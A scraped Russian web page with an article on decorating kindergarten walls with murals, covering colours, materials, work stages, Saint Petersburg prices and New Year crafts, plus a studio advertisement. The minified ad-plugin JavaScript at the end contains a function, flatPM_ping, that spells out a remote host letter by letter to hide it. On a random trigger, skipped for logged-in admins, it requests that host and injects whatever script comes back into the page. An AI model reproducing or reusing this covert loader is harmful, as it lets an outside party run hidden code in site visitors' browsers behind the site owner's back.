429 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как выполнить рисунки на стенах в детском саду

Детский сад — это второй дом для ребенка, в котором он должен и чувствовать себя, как дома. В полной мере этому способствует окружающая обстановка. Так, если дизайн помещения группы выполнен с учетом всех рекомендаций психологов, а интерьер содержит элементы, нравящиеся малышам, то ходить в детский сад они будут с радостью и интересом.

Некоторые родители принимают решение оформить стены помещения своими руками. Но не все знают, какие особенности подразумевает такая работа. Некоторые правила оформления детских учреждений помогут выполнить роспись качественно и грамотно.

Основные моменты, которые требуется учитывать при создании рисунков на стене в детской:

  1. Если игровая зона и спальня группы располагаются в одном помещении, необходимо прибегнуть к зонированию, при котором будет четко просматриваться назначение каждого участка. В игровой зоне рисунки должны быть более яркими, можно использовать желтые, синие, оранжевые и зеленые цвета. Спальная зона должна выполняться в нежных пастельных тонах: голубых, зеленых и розовых, желто-зеленых.
  2. Расцветки мебели, пола и стен в детском саду должны дополнять друг друга. Желательно выбирать тона так, чтобы не было резкого контраста. Идеальным считается зеленый цвет стен, который поднимает настроение и успокаивает.
  3. Интерьер и рисунки на стенах должны напоминать сказку. Малыши очень любят сказочную тематику: она помогает им фантазировать и способствует развитию воображения.
  4. Если для оформления стен используются обои, они должны быть экологически безопасными, хорошо мыться и чиститься. Кроме того, некоторые участки помещения можно оформить декоративной штукатуркой со слабовыраженной фактурой.
  5. Оливковые, темно-зелено-синие тона различной интенсивности не допустимы для оформления стен в детских помещениях. Также не рекомендуется использовать рисунки в белых или черных цветах. Их вид может привести к вялости и подавленности. Малыши не любят однотонности, которая быстро надоедает и вызывает скуку.

Если в детском саду нет возможности выполнить полноценную роспись, стены можно украсить простыми звездами или цветами. Изображения должны располагаться достаточно далеко друг от друга и иметь крупные размеры.

Варианты оформления в ДОУ

Чаще всего в садах расписывают спальню, коридор, лестницу и столовую. В декоре используют пластик, наклейки, обои и рисунки на стенах.

Весёлый коридор

Нам нравится как оформили коридор, рисунки гор, совсем небольшая палитра цветов и отсутствие детальных сюжетов. Это именно то, что нужно детям от 3 до 7 лет.

На углу коридора видно, как горы соединяются и сюжет продолжается на следующую стену. Чтобы рисунок не был совсем простым местами на некоторые холмы добавили травинки.

А поверх росписи изготовили пластиковые деревья, тоже простые и одноцветные. Детям не нужны сложные рисунки, которые мы любим.

Такие росписи делают крайне редко в садиках, нужно быть смелым, чтобы нарисовать что-то в таких цветах, очень жаль, что многие воспитатели думают, что сложные и детальные рисунки понравятся детям больше, чем обстановка в таких простых формах, как эти горы.

Взаимодействие с пространством

Почему бы перила на лестнице не превратить в кошачий хвост? Можно легко обыграть пространство, чтобы сделать интерьер в саду не такими скучными, а превратить их в игру для детей.

При чем расписать мы можем любой материал и поверхность – лестницу, шкафчики, пол, потолок и окна. Чем больше поверхностей задействовать, тем интереснее детям будет с ними взаимодействовать.

Любой рисунок можно легко превратить в игру. Например с такой акулой детям точно захочется поиграть. Если они её не испугаются).

А такой динозавр завлекает не боятся открывать двери. Любые непонятные и скучные предметы интерьера можно сделать интересными и обыграть их используя животных или растения.

Оформление столовой

Часто столовую тоже нужно расписать, несложные рисунки можно изобразить и там. В столовой дети проводят много времени, там они кушают и общаются. Здесь я бы не использовал яркие цвета, ведь в столовой хочется отдохнуть от суеты детского сада.

Роспись стен в ДОУ (детском саду)

Выбор рисунков

  • выбор тематических рисунков в детском саду, чаще всего падает на иллюстрации сказок, изображения животных или живописных пейзажей;
  • оформлять стоит одну или максимум 2 стены, избыток рисунков может привести к быстрому эмоциональному истощению;
  • если стены яркие сами по себе, то рисунки можно сделать более нейтральные;
  • если это игровая комната, то можно оставить рисунки яркими;
  • в спальной зоне лучше делать рисунки спокойных и умиротворяющих тонов;
  • бежевая цветовая гамма действует нейтральна, успокаивает, такой цвет можно делать в спальне у малышей, но лучше останавливаться на более нежном оттенке;
  • также там подойдет светло-голубой цвет, он умиротворяет и расслабляет;
  • для расширения пространства можно сделать переход картинки со стены на потолок, на потолке нарисовать небо.

Детское дошкольное учреждение — это место, где дети проводят большую часть своего активного времени и атмосфера в учреждении детского сада должна быть тёплой, позитивной и немного волшебной сказкой.

Очень здорово разместить в игровой комнате яркие рисунки с мультяшками и зверушками, которых дети будут с любопытством и интересом рассматривать. Не нужно делать злых персонажей или которые могут напугать детей, лучше остановится на милых котиках и собачках. Для самых маленьких в группах могут быть рисунки попроще с обилием нежных и красивых оттенков.

Оригинальным решением станет включение дверей в сам рисунок, но нужно рисовать так, чтобы дети понимали, как выйти из помещения, например как на представленном рисунке на реальной двери нарисована дверь.

Также можно сделать более цельную роспись в ДОУ, применив ее также на потолке, батареях, чтобы рисунок был более органичным.

Если в детском саду есть живой уголок и аквариум, его можно красиво обыграть в росписи на стене, сделать подводный мир ближе к деткам. То же самое касается и домиков с хомячками, морскими свинками или попугайчиками.

Если в детском саду много грамот или информационный стенд для родителей, его можно тоже красиво обыграть, сделать в виде дерева с листкочками. Такое нарядное оформление подойдет и для детского центра. На ветках можно разместить дивных птиц, персонажей.

Также можно украсить деревянные кроватки и шкафчики детей.

Материалы для росписи

Роспись стен в детских садиках производится только с помощью водоэмульсионных красок на водной основе высокой укрывистости, в идеале на базе моющейся красок и художественных.

Для росписи стен мы используем:

  • Краска моющаяся акриловая в разных цветах из сегмента чуть выше среднего.
  • Их можно колеровать в любой цвет от 1 литра.
  • Укрывная пленка.
  • Малярный скотч.
  • Линейки, простые карандаши, ластики.
  • Синтетические кисти разных размеров, плоские и круглые.
  • Валики и поддоны.
  • Лак матовый для защиты изображения.
  • Стремянка.

Высыхание происходит в течение суток, краски не имеют запаха. Дети могут находиться в помещении. Есть ряд отказных писем и свидетельств от производителей о том, что это пожаробезопасные и гипоаллергенные материалы.

Этапы работы и сроки

Предварительно выясняются следующие моменты:

  • согласование рисунка и метража под роспись,
  • создание эскизного проекта росписи стен, если его нет,
  • подготовка стен перед нанесением рисунка при необходимости,
  • непосредственно само нанесение
  • нанесение защитного лака

Главная составляющая работы в детском саду, это использование только сертифицированных материалов: краски, грунтовка, лакирующие средства.

В своем творчестве художники используют только экологически чистые и безвредные для здоровья вещества, а именно- водно-дисперсионные краски и лаки, которые можно использовать в детских и медицинских лечебных учреждениях.

Работая с заказчиком оформления детского сада, дизайнеры предлагают варианты развития дальнейшего сценария, это:

  • возможность сделать самостоятельный подбор эскиза;
  • разработка художественного эскизного проекта, учитывая пожелания воспитателей, которые проводят с детьми развивающие игры и обучение.

Далее когда эскиз готов, есть у заказчика или согласован новый, художники приступают к рисункам на стенах поэтапно:

  • подготовка поверхности под роспись;
  • штукатурка, шпатлевка ( обычно выполняется силами строительной бригады от ДОУ);
  • грунтовка ( можем взять на себя);
  • покраска стены в 2 слоя в базовый цвет интерьерными красками;
  • разметка на стенах карандашами или красками, согласование с заказчиком основных моментов на разных этапах;
  • нанесение основных цветов на изображение;
  • проработка деталей среднего плана;
  • доработка конкретных моментов;
  • нанесение контуров и надписей;
  • в завершении покрытие лаком.

Что влияет на цену?

На цену работ по художественному оформлению в ДОУ влияет несколько факторов:

  • метраж, на большие метражи у нас действуют скидки, акции;
  • высота до 3 метров или выше;
  • нужно ли выходить в росписи на потолок. Потолочные работы прибавляют к цене +25% из-за повышенной сложности;
  • нужны ли строительные леса или стремянки;
  • ограничены ил сроки проведения;
  • сложность рисунка;
  • наличие эскиза у заказчика или согласование нового;
  • удаленность от Санкт-Петербурга.

Цены на роспись стен в ДОУ в Санкт-Петербурге

Вид

Цена в рублях за м2 или предмет.

Простая роспись стен в интерьере ( орнаменты, малое количество цветов и оттенков, монохромные изображения).

Средняя роспись стен ( Мультяшки, зверушки с фоном)

Флюорисцентными/светящимися в темноте красками

От 5000 за 1 шт.

Двери ( Декор с одной стороны)

Скидки на роспись стен при заказе от 10 м2

от 1000 руб. за м2

В среднем цены на роспись в детских учреждениях начинается от 1500-2000 руб. за м2 в зависимости от сложности.

Простые рисунки с несколькими цветами,оттенками, контурные рисунки в 1 цвет, черно-белые изображения, картинки без фона будут стоить от 1500 руб за м2 и выше.

Средней сложности изображения на стене в детском саду могут быть уже от 2500-3500 руб. за м2. Это мультяшки, прорисовка фона, светотени

Повышенная сложность- это полноцветные изображения с прорисовками и переднего и заднего фона, полноценными светотенями, композиции с цветами, животными, мультяшками, людьми и т.д. Здесь цены могут быть уже свыше 5000-6000 руб. за м2.

Влияние на психику ребенка

За последние десять лет произошли огромные изменения в сфере современного оборудования учреждений для малышей.

Кардинальные изменения в интерьере современного детского сада, требуют огромной любви, чтобы окружающее пространство благотворно влияло на развитие и формирование характера ребёнка. Немаловажная вещь в учреждении дошкольного возраста, является интерьер и его оформление, благодаря которому малыши с удовольствием посещают заведение.

Даже родители смотрят на дизайнерское решение в интерьере, ведь каждому хочется, чтобы его ребёнок проводил время в прекрасно оборудованном здании. Поэтому, многие руководители детских садов заказывают роспись стен, для лучшего восприятия и развития ребёнка.

Как выбрать художника?

Для того, чтобы правильно выбрать художника, вам нужно обратить на внимание на:

  • У художника должно быть свое портфолио, фотографии не однотипные, а с разных ракурсов, в идеале защищенные авторским водяным знаком.
  • Художник должен присутствовать на фоне своих работ, как доказательство, что они не чужие.
  • Должен быть свой сайт.
  • Смотрите отзывы на сайте.
  • Он может быть зарегистрирован на сайтах по предоставлению различных услуг: яндекс-услуги, профи.ру, юду и т.д.
  • Его присутствие в социальных сетях также даст представление о нем.
  • Если есть сомнения, то пообщайтесь лично или задайте по телефону интересующие вас вопросы.
  • Выясните работает он один или в команде.

О нашей студии

Обращаясь в нашу мастерскую, можно просмотреть внушительное портфолио выполненных работ и убедится в компетентности мастеров.

Специалисты по художественной росписи владеют разными техниками, работают в любых жанрах изобразительного искусства. Живопись, графика, декоративно-прикладное искусство — в этом им нет равных.

Кроме рисунков на стенах можно выполнять работы с декоративной штукатуркой и гипсом, создавая инсталляции объемных силуэтов сказочных героев, выпуклые формы и фрески. Оживить и внести позитив в дошкольное учреждение, смогут только талантливые специалисты.

Если в помещении унылые стены, внести в них жизнь и радость не составит труда для человека с талантом художника. Все мы помним свои юные годы и прекрасно знаем что нужно для разновозрастных малышей. Выполняя роспись на стенах, учитывается восприятие рисунков от самых маленьких до возрастной категории дошкольников.

Художники нарисуют познавательные сюжеты с применением:

  • красивых букв;
  • интересных цифр;
  • цветовых соотношений;
  • разных зверюшек и букашек;
  • цветов и растений, для лучшего изучения окружающего мира.

Для малышей, которых воспитатели стараются чему-то обучить, процесс будет протекать увлекательно и интересно, благодаря тематической росписи стен сделанной руками талантливых мастеров с душой и огромной любовью к детям.

Рисунки на стенах в детском саду

Обычная покраска стен скучна для малышей, лучше предпочесть художественное оформление. Оно предполагает рисунки детской тематики по всему периметру или его части. Роспись стен в детском саду может быть сделана в виде картины по мотивам сказок, букв и цифр или других изображений. Сюда относятся и рисунки по трафаретам. Последний вариант вполне по силам воспитателям и родителям.

Сказочные сюжеты с известными героями хороши тем, что способствуют развитию фантазии. Яркие рисунки на стене в детском саду создадут впечатление присутствия в сказке.

Важный момент – изображения должны быть крупные и четкие, чтобы не рябить в глазах, вызывая у детей раздражение.

Минус такого оформления – высокая стоимость. Качественные материалы стоят недешево. А если привлекать специалистов, то цена возрастает в несколько раз. К сожалению, не все садики могут это себе позволить.

Как украсить группу к Новому году?

Воспитатели в детском саду – народ изобретательный, группу к Новому году, как правило, украшают собственными силами, не прибегая к дорогостоящим услугам дизайнеров. Им в помощь – несколько идей. Кто-то найдет для себя новое, а кто-то вспомнит хорошо забытое старое.

Театр начинается с вешалки, а детсадовская группа с входной двери и шкафчиков для одежды. Дверь можно украсить венком, основой для которого служит проволочный каркас и зеленая бумага или мишура. Дополнят новогоднюю композицию покупные или самодельные снежинки, сказочные фигурки, декоративные конфеты, маленькие «мешочки с подарками». Такими же предметами можно украсить дверцы шкафчиков, прикрепив сверху, чтобы у детей не было соблазна их сорвать.

В группе можно поставить небольшую елочку, при условии, что она не будет мешать занятиям и играм, и не рискует быть опрокинутой. Лучше обойтись без гирлянд и стеклянных игрушек. Ребятня любопытна. Такие украшения могут представлять для них опасность, а сверкающие огоньки не дадут полноценно отдохнуть во время дневного сна.

Можно нарисовать елку на листе ватмана и закрепить на стене. Оригинальным украшением для этой красавицы станут фотографии детей или игрушки, сделанные ими самостоятельно. Еще один вариант – конкурс среди родителей на лучшую миниатюрную елочку. Здесь важна не победа, а участие. Парад самых разнообразных елок сделает группу потрясающе новогодней.

К декору стен и потолка также можно привлечь родителей. Сказка легко создается при помощи подручных средств. Стены можно разрисовать специальными красками или гуашью, украсить поделками из ткани, бумаги, фольги. Легкие бумажные фигурки или шары – подвесить к потолку.

Туда же крепятся гирлянды и снежинки, которые дети с удовольствием мастерят сами. Пусть они активно вырезают украшения (вытынанки здесь) и принимают участие в украшении своей группы.

Облака

Один из самых простых способов сделать детскую фреску — покрасить стену в определенный цвет и нарисовать два-три облака разных размеров. Затем нужно покрасить их в один или несколько оттенков светлого цвета, который необязательно должен быть белым. На самом деле, лучше всего создать определенный визуальный эффект с различными нюансами, чтобы добавить красоты и глубины; даже если дизайн прост, цвет заставит комнату выглядеть хорошо оформленной.

Например, можно покрасить стену в сиреневый цвет и добавить облака различных оттенков пастельно-розового, оставив белое облако только в том месте, которое нужно сделать более заметным. Таким образом, можно воссоздать красивый закат солнца. С другой стороны, если выбрать для фона оттенок зелени, можно придать ощущение, что это гора или природный ландшафт. Фрески этого типа очень просты и подходят как для младенцев, так и для детей постарше.

Как красиво украсить группу в детском саду своими руками на Новый год 2021 из бумаги

Есть много идей поделок, которые реально сделать самостоятельно. Выходит очень бюджетно и смотрится симпатично. В качестве атрибутов праздника можно сделать из бумаги маски по типу карнавальных и раздать их детям, превратив праздник в импровизированный маскарад. За идею можно взять символы китайского нового года: лошадь, бык, крыса, тигр, кролик, змея, собака, петух, овца, свинья, дракон.

Кто владеет этой техникой, можно свернуть из бумаги фигурки оригами, тематические или нет, на выбор.

Как сделать елочку в технике оригами:

  1. Берется лист бумаги.
  2. Складывается пополам, по диагонали, потом разворачивается и снова складывается пополам, с другой диагонали.
  3. Снова разворачивается, складывается поперек пополам. Опять разворачивается и еще раз сгибается пополам.
  4. Теперь складывается по диагонали в треугольник.
  5. Справа треугольник загибается внутрь.
  6. То же делается и с противоположной стороны – получается развернутый квадрат.
  7. Правая часть сгибается к центру в треугольник, с левой стороны загибается к центру такой же треугольник.
  8. Заготовка кладется на другую сторону и проделывается то же, что и выше.
  9. Одна сторона отгибается и аккуратно загибается внутрь. Это делается и с остальными тремя сторонами.
  10. Ножницами отрезается нижняя треугольная часть.
  11. Делаются небольшие надрезы с двух сторон, не доходящие до центра.
  12. Уголки сгибаются книзу.
  13. Верхний уголок не трогают.

Стороны расправляют. Елка готова.

Для активного отдыха

Интерьер детского сада – запоминающийся, эффектный, положительно воздействует на психофизическое состояние воспитанников. Групповая комната – главная, вход настраивает на приятное времяпровождение. При оформлении помещения заботятся о создании теплой атмосферы, обеспечивающей оптимальное пребывание ребенка, разграничиваются важные функциональные зоны. На стендах размещается полезная и интересная информация для родителей, она постоянно обновляется, имеется блок меню. В помещении присутствуют игрушки, диванчики с мягкими подушками, яркие шторы, картинки с изображениями сказочных героев. Мебель простая, прочная, безопасная, желательно передвижная.

При создании дизайна групповой комнаты прежде всего учитывают возраст детей

При оформлении игровой зоны используют яркие, возбуждающие оттенки, увеличивающие двигательную активность ребенка. Помещение делится на зоны, учитывающие наклонности детей. Одному хочется рисовать, другой предпочитает строить конструкции из кубиков, третьему необходимо двигаться.

Для зонирование группы используют мебель, легкие перегородки или шторы

Совет. Желательно, чтобы декорации, стенды, выставки можно было легко заменить. При разработке дизайна помещения обращают внимание на безопасность, комфортность среды.

Уголок для настольных игр в младшей ясельной группе

Оформление тематического уголка для рисования

Интерьер в детском саду оформляют в соответствии с возрастными особенностями воспитанников. У малышей происходит активное познание окружающего мира, преобладает сенсорное развитие, игра становится возможностью многое узнать, поэтому подбирают простые предметы, различающиеся по цвету, фактуре, материалу. Средняя группа предпочтет сюжетно-ролевые игры, помещение делят на определенные зоны: «магазин», «парикмахерская», «библиотека». Дошкольникам предлагают более актуальное и полезное оформление.

Яркое оформление уголка для творчества

Помимо игровой части есть разнообразные «островки» – художественного или литературного творчества, экспериментирования, научный, физкультурный, самообслуживания. Островок живой природы становится украшением группы, это место для развития, привития любви к окружающему миру.

Живой уголок развивает у детей навыки ухода за растениями и животными

Уголок дежурных помогает воспитывать ответственность, учиться правильному отношению к делу, зона уединения позволяет отдохнуть, побыть в одиночестве. Правильное оформление интерьера детского сада создает удивительный микромир, где каждый чувствует себя уютно и защищенно.

Украшаем своими руками окна, лестницы, двор

Украсить детский сад на Новый год – значит не пропустить ни одного уголка. Лестничные пролеты со стороны перил лучше оставить в покое, а новогодние рисунки и композиции разместить на стене вдоль лестницы.

Зеркала и окна можно украсить при помощи трафаретов и витражной или другой смываемой краски. Техника проста. Из бумаги по шаблону или прорисованному контуру вырезаются фигурки и с помощью обыкновенной воды приклеиваются к зеркалу. Лишняя влага убирается, на поверхность слегка «напыляется» краска. Затем трафарет удаляется – картина готова.

Во дворе, конечно же, должна красоваться елка. Ее роль может выполнить подходящее растущее дерево. Не беда, что без хвои, ее можно создать с помощью зеленой подсветки.

Специальными гирляндами и светодиодными лентами можно украсить ограду, фасад здания, беседку для игр, деревья, кустарники. Не стоит делать это самостоятельно. Такую работу лучше доверить специалистам, из соображений безопасности.

Но есть еще одна часть работы, которая требует не столько специальной подготовки, сколько фантазии, задора и веселья. Снеговые фигуры – любой Новый год превратят в сказку. Здесь помогут родители, особенно активные папы. Исключение – случай, когда снега нет совсем.

Новогодний праздник приходит к нам каждый год. Но каждый раз детвора ждет его с нетерпением и предвкушением чуда. Старайтесь не повторяться. Пусть каждый год будут и новые украшения, и новая радость, и новые мечты.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};